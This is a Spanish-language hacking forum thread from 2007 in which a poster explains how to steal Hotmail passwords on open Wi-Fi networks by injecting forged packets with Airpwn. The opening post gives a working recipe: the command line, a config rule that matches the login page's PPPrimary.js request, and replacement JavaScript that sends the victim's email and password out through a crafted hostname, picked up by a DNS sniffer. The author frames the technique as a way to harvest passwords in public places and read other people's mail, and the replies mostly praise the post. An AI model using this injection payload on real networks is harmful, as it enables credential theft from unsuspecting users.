elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: [AIO elhacker.NET 2013] Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless (Moderadores: ChimoC, P4nd3m0n1um)
| | |-+  Como obtener contraseñas de Hotmail sin estar conectado a la red
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: Como obtener contraseñas de Hotmail sin estar conectado a la red  (Leído 104,924 veces)
axi

Desconectado Desconectado

Mensajes: 45


Ver Perfil
Como obtener contraseñas de Hotmail sin estar conectado a la red
« en: 15 Enero 2007, 02:14 »

Este pequeño ejemplo está basado en una parte de un artículo que escribí recientemente para una revista, y aprovechando que me he encontrado por aquí las imágenes me he animado a postear esto, lo sé, estará todo un poco caótico y enrevesado, pero no me apetece pensar demasiado estos días ando bastante liado, y como siempre suelo tener tendencia a hacer comentarios técnicamente correctos, voy a ser un poco más suave en este post. Lo que os voy a contar no es nada novedoso, pero creo que a algunos les puede parecer interesante conocer estas opciones. El título es muy goloso, y sé que entrarán a mirarlo unos cuantos. También sé que se pueden hacer muuchas cosas,  esto es sólo un ejemplo llamativo.

Supongo que conocereis la herramienta Airpwn, esta herramienta permite inyectar tráfico "al vuelo" en una red 802.11,
esto es, permite detectar ciertos patrones en paquetes TCP que se están transmitiendo en la red Wi-Fi y responder si el patrón es detectado mediante la inyección de un paquete TCP falso.

Érase una vez el ARP cache poisoning
Bueno y vosotros os preguntaréis, sí, muy bonito ¿y ahora qué? ¿no es eso posible hacer lo mismo con herramientas como ettercap, hunt o dsniff? http://www.irongeek.com/i.php?page=videos/ettercapfiltervid1
Pues sí, ¿pues vaya ***** no? No, no tanto, esto es el protocolo 802.11, un mundo maravilloso donde la información se comparte
para el que quiera escucharla a menos que se decida encriptarlo (existen muchas razones para no encriptarlo), ¿Wow, cuanto tardarán Ramoncín y la SGAE en pedirle un canon a un protocolo que comparte tanto? ¿Le pondrán canon al Kismet?
No nos desviemos del tema principal que es la diferencia entre las otras herramientas y Airpwn.

Airpwn no requiere estar conectado a la red, no requiere ningún tipo de contacto previo con la estación para poder hacer
su trabajo
, ¿A QUE MOLA?! ( Señor juez yo sólo pasaba por allí, yo solo miraba!, que culpa tengo yo si salen así a la calle... la culpa es de las madres que las visten como ..!!)
Sin embargo herramientas como ettercap requieren realizar un ataque previo que se suele denominar "monkey in the middle", espero que nadie se de por aludido ;-).

Inconvenientes de la forma clásica

Ettercap ( Cain, dsniff etc.. ) fue diseñado para Ethernet que funciona con cables ( como controlo eh? seguro que no sabiais lo de los cables...), y no es un medio tan generoso como el espectro electromagnético y si encima todo kiski usa switches...para modificar/ver los datos de la conexión hay que ponerse en medio de los dos transmisores de alguna manera, se me ocurren algunas
formas de intentar convencer a alguien que le dejes enchufar tu portátil al suyo mediante un cable cruzado o un hub, pero si no tienes escote ... las posibilidades se reducen, mejor se lo dejamos a los fans de Mitnick disfrazándose de técnicos de telefónica.
Asi que la otra manera que nos queda es engañando a los protocolos de red que se utilizan más habitualmente,
la forma clásica es realizando un ataque de ARP cache poisoning, si no sabeis las otras formas ahh.. se siente, ( mola la palabreja eh? espero que no esteis pensando de hacerselo pronunciar a vuestra madre... }8-) ). Entonces, estamos en medio y voilá, vemos todo el tráfico que envía la víctima al host elegido para suplantar. De esto se habrá hablado mil veces por el foro, asi que buscad.

Pero no todo es tan bonito, si la víctima utiliza protocolos que encriptan la información, como por ejemplo SSL, el tema se complica un poco a la hora de conseguir contraseñas, que si DNS spoofing que si generar certificados falsos..joder que puñetero rollo.

Además, imaginate que quieres cazarle la contraseña a unos cuantos, joder vaya puñetero escándalo de paquetes en la red, cualquier IDS de pacotilla va a saltar por todos lados, y como tengas un administrador friki aparecerá en cualquier momento con el bate por la puerta, y una cami de OMFG (También es probable que nadie se entere, sobre todo si es una red con mucho tráfico y servidores DHCP molestando).

Como funciona Airpwn
Diagrama Barrio Sésamo
Código:
Papa le pide un polvete a mama...
STA -->GET http://www.hotmail.com----> AP ---> Inet
3ms
Un amante rápido pone la semillita en mama
STA <-----------algo malo------------Atacante(Airpwn)
40ms
La semillita de papa llega tarde y mama ya está satisfecha..
STA <-HTTP(Trama legítima y que se descarta)---- AP <-- Inet
¿De quién es el hijo?
Para los frikis, mirar figura 2 y 3.
Sin más comentarios.

Pongamos una semillita en Hotmail

Pues nada, dichas todas estas absurdeces, voy a explicar otro método que se puede utilizar en redes Wi-Fi donde no necesitamos "estar en medio" para ver los paquetes, y gracias al retardo de la red podemos suplantar paquetes reales con otros a medida, ahí entra Airpwn, con el que se pueden hacer cosas tan "cool" como se puede ver en http://www.evilscheme.org/defcon/dave_images/. Con Airpwn configuramos que paquetes queremos suplantar, lo ponemos a escuchar y ale a recoger la recompensa y verle el correo a la maciza de clase en vez de jugar al mini golf en las prácticas (Qué tiempos).

Pues nada, vamos a ello, vamos a intentar robarle a alguien su contraseña de hotmail, primero, y visto que es un
rollazo intentar conseguir algo en las conexiones https, vamos a pensar en la forma de acceder al usuario antes de que
se establezca una conexión https.

Cómo accedéis vosotros a vuestro correo? mediante www.hotmail.com, o www.gmail.com, etc, cuantos frikis conoceis que metan https://www.gmail.com ? asi que estamos accediendo a http://www.hotmail.com ..
http.. humm... ¿Curioso no? poco después.. nos redirigen a una página, lo normal es que vaya a una página segura, a veces la redirección no va a una url con https, en hotmail esto depende de una cookie si te has autenticado previamente, entonces, hay un paquete que nos dice a dónde va a ir redirigida la página...
Podemos ver esta redirección en la figura 1.


Figura 1.

En un principio Airpwn sólo podia inyectar lo máximo que le permitía el protocolo en una trama, definido por el MTU, unos 2000 y pico bytes,
por lo que suplantar una página entera era prácticamente imposible a menos que la limpiaras mucho. Sin embargo, las páginas
siempre incluyen scripts, css, imágenes... En este caso la página de hotmail donde te redigire el servidor y que no es https,
incluye un fichero llamado PPPrimary.js asi que podemos suplantar ese fichero, porque es lo suficientemente pequeño,
podeis observarlo vosotros, en la página de hotmail http://login.live.com/login.srf?id=2&svc=mail&cbid=24325&msppjph=1&tw=900&fs=1&lc=3082&_lang=ES

Código:
...
<script type="text/javascript" src="JS/PPPrimary.js?x=4.5.6172.0"></script>
...

al suplantar ese fichero modificas la función que se ejecuta al darle al botón enviar y lanzas una petición DNS al aire
que contiene la información que necesitas, o una petición http, o lo que se te ocurra, esto es un ejemplo que yo he utilizado
en más de una ocasión. En la figura 2 puedes observar el resultado de de la inyección y como Wireshark detecta la trama legítima como fuera de orden, y en la figura 3 el stream TCP reeensamblado, donde puedes observar "basura" despues de la trama inyecatada que corresponde a la información legítima comprimida enviada por el servidor.

Figura 2.

Figura 3.

Como resultado, tendrá una página con el código javascript inyectado que nosotros queramos.
La ventaja de todo esto, es que si estás en un lugar público, te puedes hinchar a recoger contraseñas de una manera sencilla.

Soy muy vago y no voy a explicar detalladamente todo esto, os dejo aquí algunos ficheros que creo que son suficientemente
explicativos, airpwn 1.3 está en WifiSlax, soporta inyección WEP y fragmentación. Pasos, tarjeta en modo monitor, ponemos airpwn, airpwn encuentra un paquete que contiene la expresión regular especificada en su fichero de configuración, airpwn inyecta un paquete TCP a medida con lo especificado en el fichero de contenido. Sintaxis.

Código:
./airpwn -c ./conf/hotmail -d hostap -i wlan0

Pones el ethereal o tu analizador de red preferido con un filtro para recoger la petición dns en la que incluyes el password y el mail, como aparece en la figura 4.


Figura 4.

Código:
Fichero de configuración Airpwn.

begin hotmail
match (GET.*/pp400/JS/PPPrimary\.js)
response content/hotmail


Código:
Código a inyectar por Airpwn

HTTP/1.1 200 OK
Connection: close
Content-Length: 50
Content-Type: application/x-javascript

function OnSigninSubmit(obj)
{
email = document.getElementById('i0116').value.split('@')[0];
passwd = document.getElementById('i0118').value;
img = new Image()
img.src = 'http://hacked.'+email+'.'+passwd+'.com';
return true;
}

Los deberes para casa...
Ahora mismo Airpwn soporta fragmentación, esto que significa? que puedes suplantar paquetes de un tamaño mucho más grande,
porque puedes enviar más de una trama con información que corresponde al paquete fragmentado que suplanta al verdadero,
vaya trabalenguas. Como os he comentado en la sección anterior, la razón por la que yo suplantaba el fichero script y no la página
entera era por el tamaño, ahora podeis probar este método suplantando la página entera a los sitios que redirigen
a una página https pero son accedidos desde una página http.
La desventaja de suplantar la página entera es que los usuarios verán en su url de direcciones http://www.hotmail.com, o http://www.gmail.com en vez de ver el típico url de login en https, pero cuantos conoceis que sospecharían? y cuantos pensarían, esto es un ataque?.

Aviso

No voy a responder a comentarios del estilo "no me funciona el Airpwn", leeros la documentación o que algún alma caritativa os haga un tutorial http://airpwn.sourceforge.net/Documentation.html la versión 1.3 está disponible en sourceforge, en esa página sólo ofrecen la 1.2.
Me interesa que posteeis vuestras pruebas y resultados intentando realizar cosas sencillas y efectivas.

Ale, ahí os lo dejo por si os interesa que hay que ir a sobar.

Un Saludo,




« Última modificación: 15 Enero 2007, 19:50 por axi » En línea

rh3nt0n


Desconectado Desconectado

Mensajes: 2.037


carpe diem, quam minimun credula postero .


Ver Perfil
Re: Como obtener contraseñas de Hotmail sin estar conectado a la red
« Respuesta #1 en: 15 Enero 2007, 13:04 »

plas plas plas plas  :rolleyes:

Interesante , agudo , novedoso ... en fin muchas gracias por el aporte
se habla poco respecto otras tecnicas de intrusion wireless que no sea la suite aircrack .. y como obtener las ip's en un DHCP desabilitado ...
desde aqui te animo/pido  a que sigas enriqueciendo este foro con tus amplios conocimientos ;)

gracias


En línea

Reconoce tu tierra, tu ritmo, reconoce te a ti mismo.
Armenos


Desconectado Desconectado

Mensajes: 1.974



Ver Perfil
Re: Como obtener contraseñas de Hotmail sin estar conectado a la red
« Respuesta #2 en: 15 Enero 2007, 14:26 »

No entiendo el diagrama de barrio sésamo jo  ;D

Un buen tema, gracias por el aporte y espero que lo linkeen en el recopilatorio, si no está ya :) (soy vago y no lo miro jejeje) Saludos.
En línea

rh3nt0n


Desconectado Desconectado

Mensajes: 2.037


carpe diem, quam minimun credula postero .


Ver Perfil
Re: Como obtener contraseñas de Hotmail sin estar conectado a la red
« Respuesta #3 en: 15 Enero 2007, 15:45 »

el problema es que bajo mi punto de vista cada post de axi , merece una chincheta ...

estoy pensando en poner una que rece...
perfil de axi ...
leer todos sus mensajes ..  ;D ;D ;D ;D

PD: perdon por el offtopic .. pero es lo que pienso..
En línea

Reconoce tu tierra, tu ritmo, reconoce te a ti mismo.
axi

Desconectado Desconectado

Mensajes: 45


Ver Perfil
Re: Como obtener contraseñas de Hotmail sin estar conectado a la red
« Respuesta #4 en: 15 Enero 2007, 18:59 »

No entiendo el diagrama de barrio sésamo jo  ;D

Un buen tema, gracias por el aporte y espero que lo linkeen en el recopilatorio, si no está ya :) (soy vago y no lo miro jejeje) Saludos.
Lo he editado, tenía un pequeño despiste, espero que ahora lo entiendas mejor.

Es como si le preguntas a un conocido ¿Tienes hora?
Y Carlos Latre pone una voz que es igual a la del conocido, y dice "son las 5 y cuarto". Lo das por bueno... y te lo crees.

Sin embargo al poco tiempo, te llega otra respuesta, "son las ocho!" porque el autentico conocido ha tardado más en responderte, (estaría haciéndose la manicura) sin embargo ya no le haces caso porque te has creído la primera respuesta.

el problema es que bajo mi punto de vista cada post de axi , merece una chincheta ...

estoy pensando en poner una que rece...
perfil de axi ...
leer todos sus mensajes ..  ;D ;D ;D ;D

PD: perdon por el offtopic .. pero es lo que pienso..

Exagerao!

Un Saludo,
En línea

Division-x


Desconectado Desconectado

Mensajes: 1.356

No lo fuerce, comprese un martillo mas grande


Ver Perfil
Re: Como obtener contraseñas de Hotmail sin estar conectado a la red
« Respuesta #5 en: 15 Enero 2007, 21:34 »

Código:
Papa le pide un polvete a mama...
STA -->GET http://www.hotmail.com----> AP ---> Inet
3ms
Un amante rápido pone la semillita en mama
STA <-----------algo malo------------Atacante(Airpwn)
40ms
La semillita de papa llega tarde y mama ya está satisfecha..
STA <-HTTP(Trama legítima y que se descarta)---- AP <-- Inet

xDDDDDDDDDDDDDD
En línea

Codename!!


Desconectado Desconectado

Mensajes: 883



Ver Perfil
Re: Como obtener contraseñas de Hotmail sin estar conectado a la red
« Respuesta #6 en: 16 Enero 2007, 15:13 »

J0der bastante agudo tio, un apluso. :D :D :-*
En línea

No te dejes mover por las masas, se tu mismo.




Uxio
Hacking Wireless
Colaborador
***
Desconectado Desconectado

Mensajes: 3.894



Ver Perfil WWW
Re: Como obtener contraseñas de Hotmail sin estar conectado a la red
« Respuesta #7 en: 16 Enero 2007, 16:03 »

Genial, buena información en clave de humor. Cómo no, chinchetazo. ;)

Supongo que si no tenías una chincheta antes, es porque el foro está muy saturado, pero aún así ;)
« Última modificación: 17 Enero 2007, 15:29 por Uxio » En línea

j@son

Desconectado Desconectado

Mensajes: 27


ZOOropa


Ver Perfil
Re: Como obtener contraseñas de Hotmail sin estar conectado a la red
« Respuesta #8 en: 16 Enero 2007, 18:41 »

Este tema es super interesante, lo pude leer en la revista Hackin9 de este mes.
Si no recuerdo mal a la hora de suplantar la pagina quedaba descolocada en un lateral, creo que habia que ponerla con <Iframe>  :-X , ahora no tengo la revista en el curro. Si axi me lo permite  :P , en cuanto pueda me meto en el tema.

Saludos!
En línea

- J@son -
Magius_TR

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Como obtener contraseñas de Hotmail sin estar conectado a la red
« Respuesta #9 en: 17 Enero 2007, 02:35 »

Monstruoso... y además en plan de coña, que es como más mola leer y aprender :-)
En línea

Armenos


Desconectado Desconectado

Mensajes: 1.974



Ver Perfil
Re: Como obtener contraseñas de Hotmail sin estar conectado a la red
« Respuesta #10 en: 18 Enero 2007, 13:52 »

Código:
Papa le pide un polvete a mama...
STA -->GET http://www.hotmail.com----> AP ---> Inet
3ms
Un amante rápido pone la semillita en mama
STA <-----------algo malo------------Atacante(Airpwn)
40ms
La semillita de papa llega tarde y mama ya está satisfecha..
STA <-HTTP(Trama legítima y que se descarta)---- AP <-- Inet

xDDDDDDDDDDDDDD

Yo que decía que no lo entendía en broma ains...  ;D Realmente una merecida chincheta, pero en breve estaremos saturados de ellas. Saludos.

P.d. Tocará reunión de moderadores y decidir reducir eso, aunque realmente todas las chinchetas se merecen ese sitio... va a ser difícil poder arreglarlo  :-\
En línea

Thor


Desconectado Desconectado

Mensajes: 1.176


Ver Perfil
Re: Como obtener contraseñas de Hotmail sin estar conectado a la red
« Respuesta #11 en: 18 Enero 2007, 14:43 »

Mas ameno no podía ser el texto.

Muy bueno axi ;)
En línea

pianista
Colaborador
***
Conectado Conectado

Mensajes: 5.646


Hacking Wireless Live!


Ver Perfil WWW
Re: Como obtener contraseñas de Hotmail sin estar conectado a la red
« Respuesta #12 en: 18 Enero 2007, 14:50 »

Buenisimo axi, eres la caña tio ;D
Saludos
En línea

Uxio
Hacking Wireless
Colaborador
***
Desconectado Desconectado

Mensajes: 3.894



Ver Perfil WWW
Re: Como obtener contraseñas de Hotmail sin estar conectado a la red
« Respuesta #13 en: 18 Enero 2007, 15:46 »

Citar
Tocará reunión de moderadores y decidir reducir eso

Ya lo intentamos, no te creas, pero no sabemos qué quitar.
En línea

Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Powered by SMF 1.1.19 | SMF © 2006-2008, Simple Machines